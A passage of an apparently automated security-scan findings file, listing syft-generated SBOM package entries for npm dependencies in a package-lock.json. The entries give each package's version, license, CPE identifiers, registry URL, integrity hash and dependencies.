integrity: sha512-wfr/jstw9xNi/0teMHrRW7dsz3Lt5ARhYNZ2ewpadnhaIp5mbALhOAP+EAdsC7t4Z6wqsDVv9+W6gm1Dk9mEyw==
dependencies:
retry: 0.13.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: c5b9a7358fc490f2
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: asynckit 0.4.0'
title: asynckit 0.4.0
description: 'Package discovered: asynckit 0.4.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 3f371bd1625a90e5
name: asynckit
version: 0.4.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:asynckit:asynckit:0.4.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/asynckit@0.4.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz
integrity: sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: b5ad0267f42a44eb
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: autoprefixer 10.5.0'
title: autoprefixer 10.5.0
description: 'Package discovered: autoprefixer 10.5.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 9d0845c4768cfcf5
name: autoprefixer
version: 10.5.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:autoprefixer:autoprefixer:10.5.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/autoprefixer@10.5.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/autoprefixer/-/autoprefixer-10.5.0.tgz
integrity: sha512-FMhOoZV4+qR6aTUALKX2rEqGG+oyATvwBt9IIzVR5rMa2HRWPkxf+P+PAJLD1I/H5/II+HuZcBJYEFBpq39ong==
dependencies:
browserslist: ^4.28.2
caniuse-lite: ^1.0.30001787
fraction.js: ^5.3.4
picocolors: ^1.1.1
postcss-value-parser: ^4.2.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: fba99cf19e7cc071
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: axios 1.15.2'
title: axios 1.15.2
description: 'Package discovered: axios 1.15.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 691f5259c0d155d0
name: axios
version: 1.15.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:axios:axios:1.15.2:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/axios@1.15.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/axios/-/axios-1.15.2.tgz
integrity: sha512-wLrXxPtcrPTsNlJmKjkPnNPK2Ihe0hn0wGSaTEiHRPxwjvJwT3hKmXF4dpqxmPO9SoNb2FsYXj/xEo0gHN+D5A==
dependencies:
follow-redirects: ^1.15.11
form-data: ^4.0.5
proxy-from-env: ^2.1.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 15b2afab0d6c8b1b
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: balanced-match 1.0.2'
title: balanced-match 1.0.2
description: 'Package discovered: balanced-match 1.0.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 0d7c80c1e227b7e2
name: balanced-match
version: 1.0.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:balanced-match:balanced-match:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:balanced-match:balanced_match:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:balanced_match:balanced-match:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:balanced_match:balanced_match:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:balanced:balanced-match:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:balanced:balanced_match:1.0.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/balanced-match@1.0.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz
integrity: sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: e3263834d404d719
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: base64-js 0.0.8'
title: base64-js 0.0.8
description: 'Package discovered: base64-js 0.0.8'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: b2d621b6dd16cf05
name: base64-js
version: 0.0.8
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:base64-js:base64-js:0.0.8:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:base64-js:base64_js:0.0.8:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:base64_js:base64-js:0.0.8:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:base64_js:base64_js:0.0.8:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:base64:base64-js:0.0.8:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:base64:base64_js:0.0.8:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/base64-js@0.0.8
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/base64-js/-/base64-js-0.0.8.tgz
integrity: sha512-3XSA2cR/h/73EzlXXdU6YNycmYI7+kicTxks4eJg2g39biHR84slg2+des+p7iHYhbRg/udIS4TD53WabcOUkw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 277066fc01f56c50
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: base64-js 1.5.1'
title: base64-js 1.5.1
description: 'Package discovered: base64-js 1.5.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: c7ab39b9720e240f
name: base64-js
version: 1.5.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:base64-js:base64-js:1.5.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:base64-js:base64_js:1.5.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:base64_js:base64-js:1.5.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:base64_js:base64_js:1.5.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:base64:base64-js:1.5.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:base64:base64_js:1.5.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/base64-js@1.5.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/base64-js/-/base64-js-1.5.1.tgz
integrity: sha512-AKpaYlHn8t4SVbOHCy+b5+KKgvR4vrsD8vbvrbiQJps7fKDTkjkDry6ji0rUJjC0kzbNePLwzxq8iypo41qeWA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d8b667ce3a0cff7b
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: base64id 2.0.0'
title: base64id 2.0.0
description: 'Package discovered: base64id 2.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 224462b6727019f7
name: base64id
version: 2.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:base64id:base64id:2.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/base64id@2.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/base64id/-/base64id-2.0.0.tgz
integrity: sha512-lGe34o6EHj9y3Kts9R4ZYs/Gr+6N7MCaMlIFA3F1R2O5/m7K06AxfSeO5530PEERE6/WyEg3lsuyw4GHlPZHog==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: b03c61c0d46ca441
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: baseline-browser-mapping 2.10.24'
title: baseline-browser-mapping 2.10.24
description: 'Package discovered: baseline-browser-mapping 2.10.24'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 013c8659dba6bad8
name: baseline-browser-mapping
version: 2.10.24
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:baseline-browser-mapping:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:baseline-browser-mapping:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:baseline_browser_mapping:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:baseline_browser_mapping:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:baseline-browser:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:baseline-browser:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:baseline_browser:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:baseline_browser:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:baseline:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:baseline:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/baseline-browser-mapping@2.10.24
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/baseline-browser-mapping/-/baseline-browser-mapping-2.10.24.tgz
integrity: sha512-I2NkZOOrj2XuguvWCK6OVh9GavsNjZjK908Rq3mIBK25+GD8vPX5w2WdxVqnQ7xx3SrZJiCiZFu+/Oz50oSYSA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 83b4bdfed9e1341d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: basic-auth 2.0.1'
title: basic-auth 2.0.1
description: 'Package discovered: basic-auth 2.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 3e5df9b4f6b62db4
name: basic-auth
version: 2.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:basic-auth:basic-auth:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:basic-auth:basic_auth:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:basic_auth:basic-auth:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:basic_auth:basic_auth:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:basic:basic-auth:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:basic:basic_auth:2.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/basic-auth@2.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/basic-auth/-/basic-auth-2.0.1.tgz
integrity: sha512-NF+epuEdnUYVlGuhaxbbq+dvJttwLnGY+YixlXlME5KpQ5W3CnXA5cVTneY3SPbPDRkcjMbifrwmFYcClgOZeg==
dependencies:
safe-buffer: 5.1.2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 673442d13a9240b9
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: bcryptjs 2.4.3'
title: bcryptjs 2.4.3
description: 'Package discovered: bcryptjs 2.4.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 06243f2e41cd3912
name: bcryptjs
version: 2.4.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:bcryptjs:bcryptjs:2.4.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/bcryptjs@2.4.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/bcryptjs/-/bcryptjs-2.4.3.tgz
integrity: sha512-V/Hy/X9Vt7f3BbPJEi8BdVFMByHi+jNXrYkW3huaybV/kQ0KJg0Y6PkEMbn+zeT+i+SiKZ/HMqJGIIt4LZDqNQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: b36a32eeee7b64f7
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: bidi-js 1.0.3'
title: bidi-js 1.0.3
description: 'Package discovered: bidi-js 1.0.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 983a70fcd42b01da
name: bidi-js
version: 1.0.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:bidi-js:bidi-js:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:bidi-js:bidi_js:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:bidi_js:bidi-js:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:bidi_js:bidi_js:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:bidi:bidi-js:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:bidi:bidi_js:1.0.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/bidi-js@1.0.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/bidi-js/-/bidi-js-1.0.3.tgz
integrity: sha512-RKshQI1R3YQ+n9YJz2QQ147P66ELpa1FQEg20Dk8oW9t2KgLbpDLLp9aGZ7y8WHSshDknG0bknqGw5/tyCs5tw==
dependencies:
require-from-string: ^2.0.2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 2fa656db5288bebd
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: bignumber.js 9.3.1'
title: bignumber.js 9.3.1
description: 'Package discovered: bignumber.js 9.3.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 0debd0f90c403668
name: bignumber.js
version: 9.3.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:bignumber.js:bignumber.js:9.3.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/bignumber.js@9.3.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/bignumber.js/-/bignumber.js-9.3.1.tgz
integrity: sha512-Ko0uX15oIUS7wJ3Rb30Fs6SkVbLmPBAKdlm7q9+ak9bbIeFf0MwuBsQV6z7+X768/cHsfg+WlysDWJcmthjsjQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 7dd5ae9dd664c020
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: binary-extensions 2.3.0'
title: binary-extensions 2.3.0
description: 'Package discovered: binary-extensions 2.3.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: a472eb11fead94f4
name: binary-extensions
version: 2.3.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:binary-extensions:binary-extensions:2.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:binary-extensions:binary_extensions:2.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:binary_extensions:binary-extensions:2.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:binary_extensions:binary_extensions:2.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:binary:binary-extensions:2.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:binary:binary_extensions:2.3.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/binary-extensions@2.3.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/binary-extensions/-/binary-extensions-2.3.0.tgz
integrity: sha512-Ceh+7ox5qe7LJuLHoY0feh3pHuUDHAcRUeyL2VYghZwfpkNIy/+8Ocg0a3UuSoYzavmylwuLWQOf3hl0jjMMIw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d29a5e4fb92420c3
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: body-parser 1.20.5'
title: body-parser 1.20.5
description: 'Package discovered: body-parser 1.20.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 04b33f5cfaf593a5
name: body-parser
version: 1.20.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:openjsf:body-parser:1.20.5:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/body-parser@1.20.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/body-parser/-/body-parser-1.20.5.tgz
integrity: sha512-3grm+/2tUOvu2cjJkvsIxrv/wVpfXQW4PsQHYm7yk4vfpu7Ekl6nEsYBoJUL6qDwZUx8wUhQ8tR2qz+ad9c9OA==
dependencies:
bytes: ~3.1.2
content-type: ~1.0.5
debug: 2.6.9
depd: 2.0.0
destroy: ~1.2.0
http-errors: ~2.0.1
iconv-lite: ~0.4.24
on-finished: ~2.4.1
qs: ~6.15.1
raw-body: ~2.5.3
type-is: ~1.6.18
unpipe: ~1.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 8d245dad35d0de48
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: brace-expansion 2.1.0'
title: brace-expansion 2.1.0
description: 'Package discovered: brace-expansion 2.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 833f3564230327b0
name: brace-expansion
version: 2.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:brace-expansion:brace-expansion:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:brace-expansion:brace_expansion:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:brace_expansion:brace-expansion:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:brace_expansion:brace_expansion:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:brace:brace-expansion:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:brace:brace_expansion:2.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/brace-expansion@2.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.1.0.tgz
integrity: sha512-TN1kCZAgdgweJhWWpgKYrQaMNHcDULHkWwQIspdtjV4Y5aurRdZpjAqn6yX3FPqTA9ngHCc4hJxMAMgGfve85w==
dependencies:
balanced-match: ^1.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 2c758a1366af3ce7
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: braces 3.0.3'
title: braces 3.0.3
description: 'Package discovered: braces 3.0.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: e8863a3d87ad712b
name: braces
version: 3.0.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
